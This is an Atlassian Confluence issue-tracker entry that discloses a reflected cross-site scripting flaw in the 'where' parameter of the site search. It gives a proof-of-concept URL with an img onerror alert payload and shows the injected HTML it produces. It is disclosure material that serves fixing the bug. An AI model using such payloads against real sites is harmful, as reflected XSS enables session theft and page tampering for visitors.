Reflected XSS in 'where' param of doSearchSite

2013-08-09T04:40:10
ID ATLASSIAN:CONFSERVER-30318
Type atlassian
Reporter olivier2
Modified 2017-10-16T03:51:38

Description

Olivier Beg <olivier@hotmail.lv> reported {quote} {noformat}https://confluence.atlassian.com/dosearchsite.action?queryString=%22%3E&startIndex=0&lastModified=LASTWEEK&where=conf_all%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E{noformat}

> I asume he is DOM based because he works in google chrome. {quote}

This results in

{code:html} <input type="hidden" id="search-filter-by-space" name="where" value="conf_all"><img src=x onerror=alert(1)>" style="width: 100%"/> {code}

which appears to be parsed as having a valid {{onerror}} attribute (???), which triggers the alert box if you move your mouse or just wait a second. Checked in Firefox and Chrome. Possibly {{where}} is used in javascript context in an unsafe way.